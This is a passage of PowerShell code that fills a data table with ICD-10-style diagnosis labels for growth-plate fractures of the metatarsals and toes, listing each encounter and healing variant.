$DiagnosisList.Rows.Add("Unspecified physeal fracture of left metatarsal","Unspecified physeal fracture of left metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of left metatarsal","Unspecified physeal fracture of left metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified metatarsal","Unspecified physeal fracture of unspecified metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified metatarsal","Unspecified physeal fracture of unspecified metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified metatarsal","Unspecified physeal fracture of unspecified metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified metatarsal","Unspecified physeal fracture of unspecified metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified metatarsal","Unspecified physeal fracture of unspecified metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified metatarsal","Unspecified physeal fracture of unspecified metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of unspecified metatarsal","Unspecified physeal fracture of unspecified metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right metatarsal","Salter-Harris Type I physeal fracture of right metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right metatarsal","Salter-Harris Type I physeal fracture of right metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right metatarsal","Salter-Harris Type I physeal fracture of right metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right metatarsal","Salter-Harris Type I physeal fracture of right metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right metatarsal","Salter-Harris Type I physeal fracture of right metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right metatarsal","Salter-Harris Type I physeal fracture of right metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of right metatarsal","Salter-Harris Type I physeal fracture of right metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left metatarsal","Salter-Harris Type I physeal fracture of left metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left metatarsal","Salter-Harris Type I physeal fracture of left metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left metatarsal","Salter-Harris Type I physeal fracture of left metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left metatarsal","Salter-Harris Type I physeal fracture of left metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left metatarsal","Salter-Harris Type I physeal fracture of left metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left metatarsal","Salter-Harris Type I physeal fracture of left metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of left metatarsal","Salter-Harris Type I physeal fracture of left metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified metatarsal","Salter-Harris Type I physeal fracture of unspecified metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified metatarsal","Salter-Harris Type I physeal fracture of unspecified metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified metatarsal","Salter-Harris Type I physeal fracture of unspecified metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified metatarsal","Salter-Harris Type I physeal fracture of unspecified metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified metatarsal","Salter-Harris Type I physeal fracture of unspecified metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified metatarsal","Salter-Harris Type I physeal fracture of unspecified metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of unspecified metatarsal","Salter-Harris Type I physeal fracture of unspecified metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right metatarsal","Salter-Harris Type II physeal fracture of right metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right metatarsal","Salter-Harris Type II physeal fracture of right metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right metatarsal","Salter-Harris Type II physeal fracture of right metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right metatarsal","Salter-Harris Type II physeal fracture of right metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right metatarsal","Salter-Harris Type II physeal fracture of right metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right metatarsal","Salter-Harris Type II physeal fracture of right metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of right metatarsal","Salter-Harris Type II physeal fracture of right metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left metatarsal","Salter-Harris Type II physeal fracture of left metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left metatarsal","Salter-Harris Type II physeal fracture of left metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left metatarsal","Salter-Harris Type II physeal fracture of left metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left metatarsal","Salter-Harris Type II physeal fracture of left metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left metatarsal","Salter-Harris Type II physeal fracture of left metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left metatarsal","Salter-Harris Type II physeal fracture of left metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of left metatarsal","Salter-Harris Type II physeal fracture of left metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified metatarsal","Salter-Harris Type II physeal fracture of unspecified metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified metatarsal","Salter-Harris Type II physeal fracture of unspecified metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified metatarsal","Salter-Harris Type II physeal fracture of unspecified metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified metatarsal","Salter-Harris Type II physeal fracture of unspecified metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified metatarsal","Salter-Harris Type II physeal fracture of unspecified metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified metatarsal","Salter-Harris Type II physeal fracture of unspecified metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of unspecified metatarsal","Salter-Harris Type II physeal fracture of unspecified metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right metatarsal","Salter-Harris Type III physeal fracture of right metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right metatarsal","Salter-Harris Type III physeal fracture of right metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right metatarsal","Salter-Harris Type III physeal fracture of right metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right metatarsal","Salter-Harris Type III physeal fracture of right metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right metatarsal","Salter-Harris Type III physeal fracture of right metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right metatarsal","Salter-Harris Type III physeal fracture of right metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of right metatarsal","Salter-Harris Type III physeal fracture of right metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left metatarsal","Salter-Harris Type III physeal fracture of left metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left metatarsal","Salter-Harris Type III physeal fracture of left metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left metatarsal","Salter-Harris Type III physeal fracture of left metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left metatarsal","Salter-Harris Type III physeal fracture of left metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left metatarsal","Salter-Harris Type III physeal fracture of left metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left metatarsal","Salter-Harris Type III physeal fracture of left metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of left metatarsal","Salter-Harris Type III physeal fracture of left metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified metatarsal","Salter-Harris Type III physeal fracture of unspecified metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified metatarsal","Salter-Harris Type III physeal fracture of unspecified metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified metatarsal","Salter-Harris Type III physeal fracture of unspecified metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified metatarsal","Salter-Harris Type III physeal fracture of unspecified metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified metatarsal","Salter-Harris Type III physeal fracture of unspecified metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified metatarsal","Salter-Harris Type III physeal fracture of unspecified metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of unspecified metatarsal","Salter-Harris Type III physeal fracture of unspecified metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right metatarsal","Salter-Harris Type IV physeal fracture of right metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right metatarsal","Salter-Harris Type IV physeal fracture of right metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right metatarsal","Salter-Harris Type IV physeal fracture of right metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right metatarsal","Salter-Harris Type IV physeal fracture of right metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right metatarsal","Salter-Harris Type IV physeal fracture of right metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right metatarsal","Salter-Harris Type IV physeal fracture of right metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of right metatarsal","Salter-Harris Type IV physeal fracture of right metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left metatarsal","Salter-Harris Type IV physeal fracture of left metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left metatarsal","Salter-Harris Type IV physeal fracture of left metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left metatarsal","Salter-Harris Type IV physeal fracture of left metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left metatarsal","Salter-Harris Type IV physeal fracture of left metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left metatarsal","Salter-Harris Type IV physeal fracture of left metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left metatarsal","Salter-Harris Type IV physeal fracture of left metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of left metatarsal","Salter-Harris Type IV physeal fracture of left metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified metatarsal","Salter-Harris Type IV physeal fracture of unspecified metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified metatarsal","Salter-Harris Type IV physeal fracture of unspecified metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified metatarsal","Salter-Harris Type IV physeal fracture of unspecified metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified metatarsal","Salter-Harris Type IV physeal fracture of unspecified metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified metatarsal","Salter-Harris Type IV physeal fracture of unspecified metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified metatarsal","Salter-Harris Type IV physeal fracture of unspecified metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type IV physeal fracture of unspecified metatarsal","Salter-Harris Type IV physeal fracture of unspecified metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right metatarsal","Other physeal fracture of right metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right metatarsal","Other physeal fracture of right metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right metatarsal","Other physeal fracture of right metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right metatarsal","Other physeal fracture of right metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right metatarsal","Other physeal fracture of right metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right metatarsal","Other physeal fracture of right metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of right metatarsal","Other physeal fracture of right metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left metatarsal","Other physeal fracture of left metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left metatarsal","Other physeal fracture of left metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left metatarsal","Other physeal fracture of left metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left metatarsal","Other physeal fracture of left metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left metatarsal","Other physeal fracture of left metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left metatarsal","Other physeal fracture of left metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of left metatarsal","Other physeal fracture of left metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified metatarsal","Other physeal fracture of unspecified metatarsal, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified metatarsal","Other physeal fracture of unspecified metatarsal, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified metatarsal","Other physeal fracture of unspecified metatarsal, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified metatarsal","Other physeal fracture of unspecified metatarsal, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified metatarsal","Other physeal fracture of unspecified metatarsal, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified metatarsal","Other physeal fracture of unspecified metatarsal, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other physeal fracture of unspecified metatarsal","Other physeal fracture of unspecified metatarsal, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of right toe","Unspecified physeal fracture of phalanx of right toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of right toe","Unspecified physeal fracture of phalanx of right toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of right toe","Unspecified physeal fracture of phalanx of right toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of right toe","Unspecified physeal fracture of phalanx of right toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of right toe","Unspecified physeal fracture of phalanx of right toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of right toe","Unspecified physeal fracture of phalanx of right toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of right toe","Unspecified physeal fracture of phalanx of right toe, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of left toe","Unspecified physeal fracture of phalanx of left toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of left toe","Unspecified physeal fracture of phalanx of left toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of left toe","Unspecified physeal fracture of phalanx of left toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of left toe","Unspecified physeal fracture of phalanx of left toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of left toe","Unspecified physeal fracture of phalanx of left toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of left toe","Unspecified physeal fracture of phalanx of left toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of left toe","Unspecified physeal fracture of phalanx of left toe, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of unspecified toe","Unspecified physeal fracture of phalanx of unspecified toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of unspecified toe","Unspecified physeal fracture of phalanx of unspecified toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of unspecified toe","Unspecified physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of unspecified toe","Unspecified physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of unspecified toe","Unspecified physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of unspecified toe","Unspecified physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified physeal fracture of phalanx of unspecified toe","Unspecified physeal fracture of phalanx of unspecified toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of right toe","Salter-Harris Type I physeal fracture of phalanx of right toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of right toe","Salter-Harris Type I physeal fracture of phalanx of right toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of right toe","Salter-Harris Type I physeal fracture of phalanx of right toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of right toe","Salter-Harris Type I physeal fracture of phalanx of right toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of right toe","Salter-Harris Type I physeal fracture of phalanx of right toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of right toe","Salter-Harris Type I physeal fracture of phalanx of right toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of right toe","Salter-Harris Type I physeal fracture of phalanx of right toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of left toe","Salter-Harris Type I physeal fracture of phalanx of left toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of left toe","Salter-Harris Type I physeal fracture of phalanx of left toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of left toe","Salter-Harris Type I physeal fracture of phalanx of left toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of left toe","Salter-Harris Type I physeal fracture of phalanx of left toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of left toe","Salter-Harris Type I physeal fracture of phalanx of left toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of left toe","Salter-Harris Type I physeal fracture of phalanx of left toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of left toe","Salter-Harris Type I physeal fracture of phalanx of left toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of unspecified toe","Salter-Harris Type I physeal fracture of phalanx of unspecified toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of unspecified toe","Salter-Harris Type I physeal fracture of phalanx of unspecified toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of unspecified toe","Salter-Harris Type I physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of unspecified toe","Salter-Harris Type I physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of unspecified toe","Salter-Harris Type I physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of unspecified toe","Salter-Harris Type I physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type I physeal fracture of phalanx of unspecified toe","Salter-Harris Type I physeal fracture of phalanx of unspecified toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of right toe","Salter-Harris Type II physeal fracture of phalanx of right toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of right toe","Salter-Harris Type II physeal fracture of phalanx of right toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of right toe","Salter-Harris Type II physeal fracture of phalanx of right toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of right toe","Salter-Harris Type II physeal fracture of phalanx of right toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of right toe","Salter-Harris Type II physeal fracture of phalanx of right toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of right toe","Salter-Harris Type II physeal fracture of phalanx of right toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of right toe","Salter-Harris Type II physeal fracture of phalanx of right toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of left toe","Salter-Harris Type II physeal fracture of phalanx of left toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of left toe","Salter-Harris Type II physeal fracture of phalanx of left toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of left toe","Salter-Harris Type II physeal fracture of phalanx of left toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of left toe","Salter-Harris Type II physeal fracture of phalanx of left toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of left toe","Salter-Harris Type II physeal fracture of phalanx of left toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of left toe","Salter-Harris Type II physeal fracture of phalanx of left toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of left toe","Salter-Harris Type II physeal fracture of phalanx of left toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of unspecified toe","Salter-Harris Type II physeal fracture of phalanx of unspecified toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of unspecified toe","Salter-Harris Type II physeal fracture of phalanx of unspecified toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of unspecified toe","Salter-Harris Type II physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of unspecified toe","Salter-Harris Type II physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of unspecified toe","Salter-Harris Type II physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of unspecified toe","Salter-Harris Type II physeal fracture of phalanx of unspecified toe, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type II physeal fracture of phalanx of unspecified toe","Salter-Harris Type II physeal fracture of phalanx of unspecified toe, sequela") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of right toe","Salter-Harris Type III physeal fracture of phalanx of right toe, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of right toe","Salter-Harris Type III physeal fracture of phalanx of right toe, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of right toe","Salter-Harris Type III physeal fracture of phalanx of right toe, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of right toe","Salter-Harris Type III physeal fracture of phalanx of right toe, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of right toe","Salter-Harris Type III physeal fracture of phalanx of right toe, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Salter-Harris Type III physeal fracture of phalanx of right toe","Salter-Harris Type III physeal fracture of phalanx of right toe, subsequent encounter for fracture with malunion") + $null = 